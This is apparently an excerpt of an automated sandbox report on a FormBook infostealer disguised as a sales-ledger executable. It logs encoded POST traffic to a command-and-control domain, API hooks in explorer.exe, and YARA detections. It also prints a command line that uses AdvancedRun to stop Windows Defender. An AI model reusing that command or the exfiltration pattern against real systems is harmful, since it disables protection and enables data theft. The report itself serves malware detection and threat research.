                                                                                                              Data Ascii: Sxo=DOL1G3uGukQa5S6ViTWm9jSE2XkKv8YdiWTt9TH7gnK9u9~R8t(VsOq1UGx5GyFVDJ69eNIU4TOsV46yRl5HDlA-g5YTS5h10srwkoNSGveLtTJPzsLxhXmg92ZiMzFCBOjVYNHhS1hx0IxGKh4BGy5bV4YhfctP(bzb68ClVEK3eG3QIFJCdp5XE6Ap4ZchkAY_WsCy8PNgKNcflnjkSMSxmXjGKhJNajFbrywZHjAA19hE9dWJIo1oKcKHJ1AcOLzJszby(ri_rMdcO0ZIG9BJywCxa2rQBE3ZFv(8CFASb3wkvcZ9QjcwajLH2JpEgYVew0ta0zt0wpSMhaHIqA5JuzvpTur-exNi6mXDZ4GmRbr9efRcpBF_Hsjg~TF_aMD0hqD5Xw8nqB7iVA).


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              2192.168.2.349739185.53.179.9080C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Apr 12, 2021 14:41:19.649346113 CEST5716OUTPOST /suod/ HTTP/1.1
                                                                                                              Host: www.seniorlivingcaelderly.com
                                                                                                              Connection: close
                                                                                                              Content-Length: 170153
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.seniorlivingcaelderly.com
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.seniorlivingcaelderly.com/suod/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Raw: 53 78 6f 3d 44 4f 4c 31 47 32 32 73 76 55 45 78 75 58 69 51 6a 44 6d 75 35 69 6a 62 79 55 67 5a 6f 72 30 7a 72 6b 57 79 39 54 57 38 70 47 62 6b 6b 38 4f 52 34 66 48 53 68 4f 71 32 57 47 78 36 43 79 49 73 64 72 72 77 65 49 6f 79 34 54 47 6a 62 66 4b 7a 51 31 35 51 43 46 4e 4c 6d 35 38 49 53 5f 68 41 30 50 48 6f 30 34 42 53 43 63 75 4e 78 6d 68 55 35 4e 58 45 73 48 4b 6c 37 7a 64 72 4d 45 31 51 48 74 65 47 51 70 48 6a 66 6c 5a 6d 7e 6f 68 71 4f 32 45 45 43 69 39 59 4a 70 4d 2d 63 37 46 4c 72 36 79 6f 6d 6f 57 6b 4c 67 75 44 62 46 28 69 4e 78 5a 52 65 35 49 6b 45 35 68 57 79 49 51 77 67 42 45 6e 56 64 4f 59 30 64 39 59 46 65 45 48 68 6b 4b 55 51 4d 69 4f 70 79 47 55 47 53 63 50 62 6c 42 4c 6c 77 41 69 42 53 38 4d 39 76 35 57 39 4b 4f 5f 58 59 45 34 51 4e 43 32 47 31 67 55 4a 49 66 5f 69 7a 61 55 39 72 69 7a 28 75 6c 4b 5a 6b 4e 44 57 75 4a 30 79 7a 54 30 51 46 76 33 45 48 44 42 59 36 44 58 4f 58 41 6b 44 32 78 5a 6b 38 64 36 54 77 73 41 62 6a 4c 6c 32 4d 64 54 67 59 56 6b 77 77 34 31 79 42 52 30 7a 62 61 6c 69 39 7a 79 69 67 35 75 69 44 28 72 63 38 7e 37 65 78 46 69 34 57 47 73 5a 50 69 6d 62 74 76 38 65 2d 52 63 70 78 46 5f 4b 4d 69 72 32 67 38 42 54 50 44 4d 71 61 6a 6a 59 32 56 57 67 42 32 36 4e 4b 28 35 46 6e 4a 79 6e 41 69 55 52 69 47 54 28 53 69 54 77 52 75 57 53 75 78 48 71 49 48 68 37 42 44 4e 53 75 55 6d 42 74 43 4c 71 31 67 6f 48 36 64 4b 56 4e 47 57 28 67 47 6e 7e 78 28 74 28 62 6b 56 6c 72 74 56 7a 78 35 69 6f 5f 47 65 36 57 73 63 56 62 4f 73 57 45 36 37 33 34 6b 5f 58 69 6c 6c 36 77 4d 36 66 73 70 4c 7e 48 45 50 42 34 45 62 34 42 54 44 37 49 4c 56 31 4b 7e 44 69 54 4e 69 38 4f 73 59 36 42 63 42 78 30 65 49 71 38 5a 34 45 53 48 67 55 75 58 47 53 66 74 6e 30 45 72 45 77 74 73 56 32 63 33 6b 45 37 65 76 42 65 61 46 64 5a 56 32 74 56 58 74 6f 59 31 6c 44 62 4c 73 36 38 30 6c 62 53 69 51 6c 6b 70 46 50 36 62 50 64 46 33 48 30 74 57 4a 7a 49 64 41 44 72 36 6f 37 71 54 51 28 30 49 33 56 51 44 72 7a 35 6a 73 6f 62 46 43 38 71 66 6b 48 51 6b 66 67 65 78 52 36 58 28 39 74 56 56 6d 66 46 73 65 62 74 36 73 6c 53 50 30 6a 56 66 50 4f 36 57 48 52 52 4b 66 63 38 69 73 62 54 7e 52 76 32 52 54 51 30 58 78 66 6b 4d 62 4c 68 54 41 38 74 73 68 4b 31 31 34 46 47 42 7a 38 56 74 52 42 56 73 42 28 6c 6e 4a 51 62 30 35 50 76 48 51 6d 32 45 75 4d 6d 62 48 28 2d 34 57 79 4f 55 75 4a 7a 53 6a 39 56 64 73 65 50 28 4e 74 4a 62 30 54 30 59 50 4e 6b 55 73 4d 71 6e 76 72 4f 53 57 37 30 38 47 69 62 64 6a 33 4c 73 51 76 34 64 74 6a 45 30 4c 41 7a 7e 42 67 51 63 4d 78 64 28 76 72 5a 64 4a 4a 42 4d 76 28 44 30 46 30 41 57 38 4e 4a 77 56 73 69 70 33 6d 6f 56 52 57 66 71 30 32 59 4f 6e 77 78 78 66 4a 52 7e 41 61 71 65 55 62 67 48 2d 33 70 51 37 37 4d 61 35 69 58 7a 70 6b 73 35 4a 6a 41 49 5a 68 49 36 32 4e 71 74 67 68 42 64 56 37 4e 74 68 61 68 75 4c 6f 31 49 65 76 63 53 4b 73 5f 68 6e 6c 5f 66 33 49 52 4f 69 50 6c 33 4d 6b 55 64 61 36 46 71 4e 70 4b 31 6c 28 65 51 48 47 30 4f 4b 47 30 36 58 78 72 36 33 41 75 55 46 62 48 73 53 35 61 59 4c 55 67 4c 6c 66 30 6d 58 75 6d 7a 77 28 5a 4b 30 48 39 56 34 30 33 49 33 37 32 76 6a 42 72 31 51 6d 73 41 61 61 48 7a 46 51 5a 6b 49 46 5f 4f 47 65 6a 65 59 70 62 34 51 4f 52 55 4b 54 38 30 5a 4a 45 43 6e 65 4b 45 56 48 2d 6f 4f 51 35 4a 78 50 4d 28 39 63 50 30 39 7e 34 35 6a 6b 6d 4c 50 7a 41 4b 67 4d 59 69 67 43 79 49 34 74 64 6f 31 34 6d 44 6e 4e 52 57 48 65 71 69 42 61 68 30 37 31 45 70 5f 32 68 44 65 47 43 44 36 44 30 79 69 37 6b 34 5a 73 47 54 34 38 55 50 49 6f 39 63 61 62 4f 49 78 32 30 71 58 72 4a 56 67 63 4d 31 55 69 6e 7e 4a 79 4b 6b 7a 69 54 50 65 7a 66 6d 37 44 45 67 76 74 52 72 4e 70 30 42 57 4e 6d 56 44 4d 48 74 6b 44 45 7e 49 31 6c 78 2d 50 64 34 70 39 46 62 65 68 2d 33 51 5a 4a 53 36 37 32 69 65 68 45 44 78 53 44 4b 73 74 72 7e 6e 79 47 64 6d 33 5f 6e 6c 71 65 55 70 28 6a 39 72 6f 4c 56 6b 66 42 4b 53 34 68 47 4a 31 4f 6c 34 45 5f 72 78 5a 65 73 30 64 75 4a 4b 33 65 4c 4e 5a 63 57 71 6c 69 72 44 57 2d 75 65 57 30 30 38 32 37 45 75 36 6a 4b 57 67 77 70 4d 70 62 61 74 38 51 28 67 39 59 58 55 65 4a 6c 78 35 68 4c 51 38 4b 6d 67 69 69 61 57 33 47 47 5a 57 74 52 4b 75 4c 5a 56 66 4e 41 72 4d 47 7a
                                                                                                              Data Ascii: Sxo=DOL1G22svUExuXiQjDmu5ijbyUgZor0zrkWy9TW8pGbkk8OR4fHShOq2WGx6CyIsdrrweIoy4TGjbfKzQ15QCFNLm58IS_hA0PHo04BSCcuNxmhU5NXEsHKl7zdrME1QHteGQpHjflZm~ohqO2EECi9YJpM-c7FLr6yomoWkLguDbF(iNxZRe5IkE5hWyIQwgBEnVdOY0d9YFeEHhkKUQMiOpyGUGScPblBLlwAiBS8M9v5W9KO_XYE4QNC2G1gUJIf_izaU9riz(ulKZkNDWuJ0yzT0QFv3EHDBY6DXOXAkD2xZk8d6TwsAbjLl2MdTgYVkww41yBR0zbali9zyig5uiD(rc8~7exFi4WGsZPimbtv8e-RcpxF_KMir2g8BTPDMqajjY2VWgB26NK(5FnJynAiURiGT(SiTwRuWSuxHqIHh7BDNSuUmBtCLq1goH6dKVNGW(gGn~x(t(bkVlrtVzx5io_Ge6WscVbOsWE6734k_Xill6wM6fspL~HEPB4Eb4BTD7ILV1K~DiTNi8OsY6BcBx0eIq8Z4ESHgUuXGSftn0ErEwtsV2c3kE7evBeaFdZV2tVXtoY1lDbLs680lbSiQlkpFP6bPdF3H0tWJzIdADr6o7qTQ(0I3VQDrz5jsobFC8qfkHQkfgexR6X(9tVVmfFsebt6slSP0jVfPO6WHRRKfc8isbT~Rv2RTQ0XxfkMbLhTA8tshK114FGBz8VtRBVsB(lnJQb05PvHQm2EuMmbH(-4WyOUuJzSj9VdseP(NtJb0T0YPNkUsMqnvrOSW708Gibdj3LsQv4dtjE0LAz~BgQcMxd(vrZdJJBMv(D0F0AW8NJwVsip3moVRWfq02YOnwxxfJR~AaqeUbgH-3pQ77Ma5iXzpks5JjAIZhI62NqtghBdV7NthahuLo1IevcSKs_hnl_f3IROiPl3MkUda6FqNpK1l(eQHG0OKG06Xxr63AuUFbHsS5aYLUgLlf0mXumzw(ZK0H9V403I372vjBr1QmsAaaHzFQZkIF_OGejeYpb4QORUKT80ZJECneKEVH-oOQ5JxPM(9cP09~45jkmLPzAKgMYigCyI4tdo14mDnNRWHeqiBah071Ep_2hDeGCD6D0yi7k4ZsGT48UPIo9cabOIx20qXrJVgcM1Uin~JyKkziTPezfm7DEgvtRrNp0BWNmVDMHtkDE~I1lx-Pd4p9Fbeh-3QZJS672iehEDxSDKstr~nyGdm3_nlqeUp(j9roLVkfBKS4hGJ1Ol4E_rxZes0duJK3eLNZcWqlirDW-ueW00827Eu6jKWgwpMpbat8Q(g9YXUeJlx5hLQ8KmgiiaW3GGZWtRKuLZVfNArMGz0tHyP9IYJg3~YU3TcsZFbWcvlsffTz25a2i3whGX8eODLcv9sm7VCdbqAfGQ2QdJ1jZziArurLUSrGAFuBOhlPjoVVc62U2a4sULFUceAC1vOWrfEuq9H2jKqK9zKpG2ridn5YR1DckHKdSin4AyXHfIHWjDINK4hl0MiVs5NG4BRlGt6FeoBrKGKY4vpPj36t1nQm896PS0cHmeFUwwB2M7EBZY7C67irbSz2yJXjW04yrt-D6lGDRPowf1b2zwdZKg1IteMke66cpTusULXFOfAFvOraJzdxByV(pRwp9KAcPgSF9NcWbXtkglxCq5o83Hx6biCJtHDcm28KMK8VVqbESb2z2tha_NqkwUdA7TRR1O0DNS-U7eP~-nakVDQMLlwWHwUZ9CTopCbo2MsC85y01JwH5JY32WxRmQQI-37VQ6nFMEA(3V-5PMpMZzmukc_Z44Q2xy6JHw5Ll44DEFRJmtWg9ERbxE14kURtEMRp0ZjrLp00B72Fp5-XMM1uoF1semS6bwYl0S-3xhfg6(9rBbYC7tMR8qG~5xEdU4flF1VljXmNMy_Fv9LaNC-t2O3(AP_~jbFaLTm4qQ97eLg5ehox88sfNaGSiEem55QhHMz4XIbd9Mrv6ZHc7vwW7FHj7lOpI(Kx49EZae0V-Ko2-aevSDoRS9qj9Zff_4WsbLrfXyG9Zt6Z_QW1wMeUJDHzSfXo9a9YmwXk3s6OHAel3c2SttXRG5TeNKgTjqCDrFWG3x1AodmgdSS7iBc6B9jqA92pOXjJkuWmUcDTg9XCB082Eep43F65r5QDnhjhc1kCh7WgbZNCjLi1ndm9Y~Su4TNURRHgksb2W1kYHMa3p~Y68Mx93TPSjl2M7M3aBtq4Ji8kALXIhXMiOG5~fksYMk01JFHYOQvhyXPbrIAdWO6TqcMigwwZPv0mx76cLupeOJIolhxU29ksLCUQJNZ5D7m1LUSsfkkzNkf2VE0FCdOI3rfOngJPcEVAHCK7C89iWWOZqYV05nuXgZD5dEKWv~QJob1dVkMjW4NLfE0zrLTnQFgM_ob9oyO1to1VMxJ0DqCwvz1DOkft5r515FO6vXMbBY-EoG_JjLYD_E_5AxS~wHdvVTinSAZ63HL0pFEDNY0mW1_2KyrlD8xHofAIyBF8tOudy(_p3DtWpcNNaejmjbBUxHV8PfezKBkuTUhDs0eyrhvdRPTg34vyQnc0lG6Jc1tFOiFJNg2~HhLyTg-(xFw8XOZvY2j~A(hpTDFkIcT3XBpk04BjnP4CeZscID61zqbHWHyGC4kCgCU7eZVA5aG1w15nGSjcYfVkRHOBwoUcpBRdDMfoacjU_(A1-9xmKa7pcjey4S_DHWdtVukYsRHQgD_a49Dv4z1HJAYvqa-gKJdi6JwfwPJ5ah7lw5wbKNWe9jFDMjtGNJ4pwAF1HG_TWcYM6YxpY1eN3MEQqcs1xS4g3(x6Z7ZO1phXEsGX3o6zeWhM54UwUY-973n~qO_ucn9oWuI4YEjYuMW1RDfEeW6kprY62ECqAPVEaUF(T~V9jMZJ1mTzvgzdiPAAwGTumYHlP5_oHi_K69coN6VoQT8c0DsG0qc6hctqiSd~WzivWwNQhbbEiyTMvTQo1H-tlgWThhfaYK54y9DtabsXREpeU78iXwTodvyi3tbVpU3UOYG(_j2XwCpL1BvBUu1lThgzpZMbLIRrOEL39nSv_eIXD4DzwxVwDQVx3~xjC0R6fVdhunrcUf0WEaOqxRRp3nMtwRB7DMDpaTKAR7xd4exgoyVTTlxRU2vcj1tDDqH1OoiKsDGIwvDIibrFSqJ0qWU5kvGt9501o(97c6xnGd1AGLOStbc4C(7mmtkAI9IT_zo~vekdKfzhfCFEgWvHvw1WVlZTHr78uYetrvaHCwcbvJx9y3Tbwi31Ep7PBRgN6dqfkPAYD8J3fdZN4DhMdk00EvsJaPglW7kkEjxkIjsQ6XkJLsZiEFT1UzZ(R5ZIa6aD7BwdKmiOa1LOWwVJT6d4NFND04wt53erS1xazPqYy0Sh40RlLDC17idCzb_Z0elpYv0nwM6b5DBAE6I10idA9067RV5ZJYuSZhHOaNlAHEV960SfUvfT2VK9_HBqNBTHf26zHBcdXLSOgIDj3HzYqWpgVg0mdnZnRsV0WFYWCnHy0lvcL5TMow1Mu9J9Sz8ONL_L1fMAWNbi9It5BXptqIss1nmPUrc6BUrLHVua0wCef0TT1C9YD3GLkWvo-gYGAv9tNIPFEi14rsAZpd00MW_4jy5alQck5d2BnGjKKLTtXclNNyUQoaRGBhonBarta~8k8fcHKL1~Y3CCRA37eEAZPnO8Bt5NPEr6IwXbGdZjXxMQ4FAznZe6-K-eBv5~YBYYI(I4QBgugVIbTk2Vd3H2ozt~1GDzwaJj0ziM9qgVsdG1LQXEKiS7PetMslLQXwGSl4xOWhyjSNtiG4F6j36xh6FV5TyTIEqm5TR2UlhPHD_WWtOtS~1EEjnN394QajXyYFYzm5sTV(roo2SbB9Esm9RVcMRG0HFDg8s9Kk_dxZEdj8VoGsUmBsz5mXJoAaDfvkQ53YrKoqv1R72xhWs6wbojFbaVVimk2M3N2LlC_DhkhY8WCeVQK(MnzFRblKlnlCNrA~SlGbN7DfP7ELWWqoUbiJxQXfmcZF5VqDtVzbqAZ52JtSxFLmi(UNwzWtdQ0rov9aibHut3Y
                                                                                                              Apr 12, 2021 14:41:19.690514088 CEST5729OUTData Raw: 36 46 58 63 34 42 58 37 34 44 32 6d 69 41 41 37 58 74 65 67 4c 38 47 56 72 36 64 75 6d 4f 37 71 5a 77 76 4f 44 6d 5a 52 7e 66 43 33 66 5f 48 6e 65 75 4d 74 72 51 69 44 62 65 4c 79 54 65 39 71 59 68 67 63 6a 69 41 4b 66 6f 37 32 7e 64 35 75 32 77
                                                                                                              Data Ascii: 6FXc4BX74D2miAA7XtegL8GVr6dumO7qZwvODmZR~fC3f_HneuMtrQiDbeLyTe9qYhgcjiAKfo72~d5u2wc4hGTa3qBoBDfFvyLRGe2d8Ux7N4b-32cVtSUWIYKbtGa18PKdOzpIHxijh2NlU5UUVJOhQ2t_wjWRq7RyPM2INyI2Lwm1tAys0Vuqc5MnmbdDLji8qZBrk_7JL_RqmeQhoFJSy6nwmUCCBdmnQdIEbglXhoAWlcM
                                                                                                              Apr 12, 2021 14:41:19.690650940 CEST5742OUTData Raw: 6a 6b 6c 7a 6b 54 63 41 32 77 61 46 78 52 74 54 41 52 65 6b 48 53 43 5a 44 37 65 64 33 4a 48 48 37 4a 78 7a 6d 6e 71 58 59 45 37 31 74 44 31 51 58 41 73 55 46 58 39 68 52 6b 4a 67 4b 6f 39 41 76 35 36 68 31 61 4c 64 34 39 70 37 57 73 71 55 46 4d
                                                                                                              Data Ascii: jklzkTcA2waFxRtTARekHSCZD7ed3JHH7JxzmnqXYE71tD1QXAsUFX9hRkJgKo9Av56h1aLd49p7WsqUFMdbEnHaRwObGMfIfDU-knZLgER8Fx8BAnq5yFQ1u2pT9sg6EUHI2HRAvPNqeEQHIXyc7gWpnb0qYw6cQ0hsGM8P(BYES-LiG12vNCq9wrPyQ8FLlF4zuYRt(0Qk7G2uAXXis07NlhOwvcs8nlHZQKnDYIQaWHhWr2N
                                                                                                              Apr 12, 2021 14:41:19.731406927 CEST5768OUTData Raw: 75 67 4f 4b 33 43 6f 44 41 50 30 68 44 6e 7a 51 5a 58 36 59 79 32 72 42 59 77 49 47 4d 4b 4b 6e 55 4e 63 61 64 49 50 4c 45 58 58 67 71 33 6c 74 7a 44 6a 63 76 44 28 4f 42 33 61 69 49 6d 4a 72 4e 79 54 66 6e 38 37 59 37 65 42 72 61 57 66 4d 28 70
                                                                                                              Data Ascii: ugOK3CoDAP0hDnzQZX6Yy2rBYwIGMKKnUNcadIPLEXXgq3ltzDjcvD(OB3aiImJrNyTfn87Y7eBraWfM(p0nBsQ1j4bSPgRBZZYiH8oWPkzDppEPCilthUWb9abynAuyPqyEH2lxvQy8IYh9CaE1c_zRfQEkSmf-rOOAkwJT3syJAKGJozP5JcZ-NV3GtAKqK1Pmq-Lg9n14VW9GU78q8N8y91JQzfCp0GkfrM3xRSU1LYsgn_Z
                                                                                                              Apr 12, 2021 14:41:19.731496096 CEST5774OUTData Raw: 54 79 59 49 79 77 69 5a 6b 4a 46 4c 77 4e 59 52 44 41 58 4b 30 6d 6f 73 67 44 32 77 78 70 4a 69 50 66 65 44 7a 72 73 4f 30 6b 72 69 6d 79 4c 31 78 47 53 72 6d 39 48 48 52 38 37 6c 64 58 5a 63 62 4c 6e 72 74 42 51 78 4d 51 59 46 56 42 6b 67 7a 64
                                                                                                              Data Ascii: TyYIywiZkJFLwNYRDAXK0mosgD2wxpJiPfeDzrsO0krimyL1xGSrm9HHR87ldXZcbLnrtBQxMQYFVBkgzdMgFcRujzo6xxKEQi03MLYijNSzhPKaxqt-b1HhNhxA6ootZyTqylJrQN6YREr_4Ou7CO1eWTAYQHkUxKOCLNULlKyEC6n3mdDOmxKNxWDt8J0qnIOdTbkvw6j_g2AqinlO8cW_(By_cESbLXcKO099vheOp5nXxWc
                                                                                                              Apr 12, 2021 14:41:19.731820107 CEST5789OUTData Raw: 6e 34 72 62 4d 31 73 32 55 74 33 36 61 57 51 72 71 44 69 52 43 61 35 52 65 75 77 50 65 6e 71 67 52 76 4e 4e 39 69 4b 58 4c 7a 69 2d 33 4a 61 32 4e 75 56 5f 79 37 38 56 55 4c 52 49 72 74 7e 59 4e 43 62 55 63 45 63 4b 72 51 64 4c 57 56 4f 59 67 70
                                                                                                              Data Ascii: n4rbM1s2Ut36aWQrqDiRCa5ReuwPenqgRvNN9iKXLzi-3Ja2NuV_y78VULRIrt~YNCbUcEcKrQdLWVOYgpgj0kWJC7k6yevNg2mfQuMvXUjTQc3s70SdEzKr1WUCUmdvlbMksQo9FrLk13n76oP9zoN0leayz-sVfE43Aw0FngIXbXpN9Ty-2SBmITM9ULr6hRxNiugovXNrYfyeqY4TVz8OQjL4DhWqW_8_HfFNL1jvPLNvrD4
                                                                                                              Apr 12, 2021 14:41:19.731931925 CEST5795OUTData Raw: 5a 53 54 6f 6a 52 4b 56 57 35 31 33 7a 52 4a 73 6c 4b 71 33 6e 72 7e 74 30 6e 49 51 30 6d 4f 4b 56 68 79 68 30 31 75 36 28 73 4e 31 4f 4f 4d 52 63 73 51 6d 5a 42 39 66 63 38 35 53 6d 75 28 55 31 5a 45 51 31 62 28 55 71 37 6c 47 64 6a 61 79 6b 4b
                                                                                                              Data Ascii: ZSTojRKVW513zRJslKq3nr~t0nIQ0mOKVhyh01u6(sN1OOMRcsQmZB9fc85Smu(U1ZEQ1b(Uq7lGdjaykKc84b0dsWZpqOBwe6Hd(7BQ9rvcWMoAPXXMWqxjeDcDoZySu_6JokkX9IIV9ORBR2cicYzewBZOj4INXxLsZaD98NZnZTcJljEQ9VUibJy13wXYwX4cdyHi2gFw7YzXgV25KqSbqLdNu0G_j2CDw0p0ZEQig_J6Pjh
                                                                                                              Apr 12, 2021 14:41:19.772305965 CEST5809OUTData Raw: 6b 6e 48 47 51 39 76 70 66 51 6c 6f 37 71 41 32 30 4c 4f 5a 76 6c 76 67 38 34 74 73 34 73 6a 6e 5a 79 69 78 65 35 42 6e 66 69 56 41 31 4b 57 46 33 69 7e 75 67 4e 6e 74 4c 75 6e 30 41 62 79 6a 28 42 48 44 7e 6e 72 79 58 70 32 69 46 30 49 71 75 47
                                                                                                              Data Ascii: knHGQ9vpfQlo7qA20LOZvlvg84ts4sjnZyixe5BnfiVA1KWF3i~ugNntLun0Abyj(BHD~nryXp2iF0IquG4xuiGg4Kx5GewSsQEBgvyErau08X3B5r80VURDSrc_6PP6okYkplgILriwY1vlOb65(UE6A9ZqsMb2hlxrnkUwEmA1quLt0l~qtSzvg0q4mzfiz1riAkIM2dQNkxcA69i6JWsGNCJ2ece4f_mjqACn15AySI83oza
                                                                                                              Apr 12, 2021 14:41:19.772356033 CEST5813OUTData Raw: 4a 68 72 78 62 65 62 4e 44 52 78 78 4f 53 54 74 71 50 55 38 31 75 43 63 32 37 67 7a 50 4b 30 37 28 2d 59 67 35 71 63 61 55 77 71 6e 64 50 62 65 46 33 68 38 4f 77 6b 6e 51 36 4d 79 50 79 39 43 58 49 77 37 47 76 54 70 4c 5a 54 65 42 4e 56 76 36 71
                                                                                                              Data Ascii: JhrxbebNDRxxOSTtqPU81uCc27gzPK07(-Yg5qcaUwqndPbeF3h8OwknQ6MyPy9CXIw7GvTpLZTeBNVv6qUgTQPZ9fUthX6LJVyHFtTTFlO-lipbJg50zqPL6Z50keqAcGVN7HM5uy4YKOgx2ir4mnNFPG9elQDOfGnQRaEsImxwqX(uKyXgtYFuQrIRwY1Su460unA5QkqHyd8Da5HNWL9-CBxjfZucq6mXd0Honu4ZdQ~B8CD
                                                                                                              Apr 12, 2021 14:41:19.772377968 CEST5826OUTData Raw: 51 66 48 6d 74 37 61 55 31 71 62 59 46 6a 34 69 4c 59 57 75 52 57 7e 70 6f 6d 4b 30 4f 70 7e 4e 4e 6d 31 32 65 67 75 65 47 71 52 4e 79 4d 71 77 44 4b 7a 5f 75 75 48 31 6e 64 53 41 58 54 7e 68 47 44 72 6d 73 5f 48 4e 67 36 66 35 76 4e 4b 75 43 6c
                                                                                                              Data Ascii: QfHmt7aU1qbYFj4iLYWuRW~pomK0Op~NNm12egueGqRNyMqwDKz_uuH1ndSAXT~hGDrms_HNg6f5vNKuCljLB9OtD7wnN_ydR2BXQwa8oovGvOHjmzA2QaABnHEuqxlnq1xEsOCus1qg2NDFtaKigu5VDAuZLH(sJIxI96TLgBim~zTg1dSx38BFYxvYSheFJroyWXv5SacZT1jg8IA4M7AJjvnUm8BiSeMfLvQiFXZ-CmMjz6Q
                                                                                                              Apr 12, 2021 14:41:19.772605896 CEST5837OUTData Raw: 65 74 43 57 6e 56 55 68 70 38 78 4b 48 69 6c 33 41 73 33 39 63 70 52 77 65 33 70 41 48 41 6b 78 62 4b 6e 52 57 69 39 78 37 38 55 51 36 4e 59 7a 4e 4c 69 7a 56 33 61 77 4b 4b 72 4c 72 45 4a 6d 48 69 67 45 76 64 66 67 47 6b 77 77 32 74 35 5a 39 2d
                                                                                                              Data Ascii: etCWnVUhp8xKHil3As39cpRwe3pAHAkxbKnRWi9x78UQ6NYzNLizV3awKKrLrEJmHigEvdfgGkww2t5Z9-yrsl1OqbSVDUCRXanrsGz_313cw9j4XT9OeoxLAY~yGOll3N2iAYlkHHVTGeRu2bIuM7lbIX9_rdztu9nqEvQuh5bDcClz1HffpnYI(MRjcmjV2aEOGOvbzDrF1aW0ixMmUkFU9EmT35ZxzBS-txmMYvNBP7kuibH


                                                                                                              Code Manipulations

                                                                                                              User Modules

                                                                                                              Hook Summary

                                                                                                              Function NameHook TypeActive in Processes
                                                                                                              PeekMessageAINLINEexplorer.exe
                                                                                                              PeekMessageWINLINEexplorer.exe
                                                                                                              GetMessageWINLINEexplorer.exe
                                                                                                              GetMessageAINLINEexplorer.exe

                                                                                                              Processes

                                                                                                              Process: explorer.exe, Module: user32.dll
                                                                                                              Function NameHook TypeNew Data
                                                                                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xEE
                                                                                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xEE
                                                                                                              GetMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xEE
                                                                                                              GetMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xEE

                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              Analysis Process: Require your Sales Ledger from 01-April-2020.exe PID: 5792 Parent PID: 5616

                                                                                                              General

                                                                                                              Start time:14:39:18
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe'
                                                                                                              Imagebase:0x500000
                                                                                                              File size:736256 bytes
                                                                                                              MD5 hash:C7C27E1859F1593AEDB1EEBF0A15175E
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.205785020.0000000000502000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.313035991.0000000000502000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000003.309575411.00000000072A5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              Reputation:low

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: AdvancedRun.exe PID: 2644 Parent PID: 5792

                                                                                                              General

                                                                                                              Start time:14:39:50
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run
                                                                                                              Imagebase:0x400000
                                                                                                              File size:91000 bytes
                                                                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 3%, Metadefender, Browse
                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                              Reputation:moderate

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: AdvancedRun.exe PID: 6200 Parent PID: 2644

                                                                                                              General

                                                                                                              Start time:14:39:54
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
